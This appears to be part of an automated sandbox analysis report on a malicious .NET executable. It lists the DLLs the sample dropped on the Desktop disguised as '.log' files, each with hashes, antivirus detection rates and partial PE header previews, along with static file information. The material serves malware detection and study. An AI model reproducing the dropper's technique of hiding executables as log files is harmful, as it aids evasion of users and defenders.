                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                            C:\Users\user\Desktop\imbBpzmp.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38400
                                                            Entropy (8bit):5.699005826018714
                                                            Encrypted:false
                                                            SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                            MD5:87765D141228784AE91334BAE25AD743
                                                            SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                            SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                            SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\jafJbNin.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):126976
                                                            Entropy (8bit):6.057993947082715
                                                            Encrypted:false
                                                            SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                            MD5:16B480082780CC1D8C23FB05468F64E7
                                                            SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                            SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                            SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                            C:\Users\user\Desktop\krGRUzVH.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34304
                                                            Entropy (8bit):5.618776214605176
                                                            Encrypted:false
                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\lcSrxwmi.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\mrAShSvf.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):294912
                                                            Entropy (8bit):6.010605469502259
                                                            Encrypted:false
                                                            SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                            MD5:00574FB20124EAFD40DC945EC86CA59C
                                                            SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                            SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                            SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                            C:\Users\user\Desktop\mutAqiZC.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):342528
                                                            Entropy (8bit):6.170134230759619
                                                            Encrypted:false
                                                            SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                            MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                            SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                            SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                            SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\pekirssD.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):126976
                                                            Entropy (8bit):6.057993947082715
                                                            Encrypted:false
                                                            SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                            MD5:16B480082780CC1D8C23FB05468F64E7
                                                            SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                            SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                            SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                            C:\Users\user\Desktop\pfYQxwkv.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):46592
                                                            Entropy (8bit):5.870612048031897
                                                            Encrypted:false
                                                            SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                            MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                            SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                            SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                            SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\qhrIoOvZ.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33280
                                                            Entropy (8bit):5.634433516692816
                                                            Encrypted:false
                                                            SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                            MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                            SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                            SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                            SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\rhLyTfpq.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):70144
                                                            Entropy (8bit):5.909536568846014
                                                            Encrypted:false
                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\sSWZvcGR.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):41472
                                                            Entropy (8bit):5.6808219961645605
                                                            Encrypted:false
                                                            SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                            MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                            SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                            SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                            SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\saGrZLhX.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38912
                                                            Entropy (8bit):5.679286635687991
                                                            Encrypted:false
                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\taahEcao.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38400
                                                            Entropy (8bit):5.699005826018714
                                                            Encrypted:false
                                                            SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                            MD5:87765D141228784AE91334BAE25AD743
                                                            SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                            SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                            SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\trhzTxUr.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):5.541771649974822
                                                            Encrypted:false
                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\vUJHQLLN.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\wINPCZGL.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36352
                                                            Entropy (8bit):5.668291349855899
                                                            Encrypted:false
                                                            SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                            MD5:94DA5073CCC14DCF4766DF6781485937
                                                            SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                            SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                            SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\xiXqauUk.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.660491370279985
                                                            Encrypted:false
                                                            SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                            MD5:240E98D38E0B679F055470167D247022
                                                            SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                            SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                            SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\yVbyLHQi.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\zTDGhHfd.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):64000
                                                            Entropy (8bit):5.857602289000348
                                                            Encrypted:false
                                                            SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                            MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                            SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                            SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                            SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            \Device\Null

                                                            Download File
                                                            Process:C:\Windows\System32\w32tm.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):151
                                                            Entropy (8bit):4.836131992046579
                                                            Encrypted:false
                                                            SSDEEP:3:VLV993J+miJWEoJ8FXUE5CQ9U5zvo0WLy6vj:Vx993DEUH2COGcvx
                                                            MD5:692605F689E3F671A623F4C2C4FA2FEA
                                                            SHA1:524DAA0A17D27868D57720D74F618A7255D989E8
                                                            SHA-256:204CA1746B0F35D8E994A8422CA010ADC1398D2947437EF6AC83ACA153DEA275
                                                            SHA-512:0315667D78C3264608C1CF2666F1D791DE0555ED0A3A078942D82893F93E32C763814CC5260C16FA55DE43911CFDA0388B35A4CB77080F1CDBB38E329050B85D
                                                            Malicious:false
                                                            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 15/12/2024 15:01:48..15:01:48, error: 0x80072746.15:01:53, error: 0x80072746.

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.825669080809428
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:150bIjWiGH.exe
                                                            File size:3'700'736 bytes
                                                            MD5:e7870cd0c30a52066c454c15a5a5a2f5
                                                            SHA1:fc64203e05c104a116e7e4c354c9ee77c99737d6
                                                            SHA256:e4a958444e72eb1b3be02f3a8bf29044a81f328405a4969a4f66515ef219774e
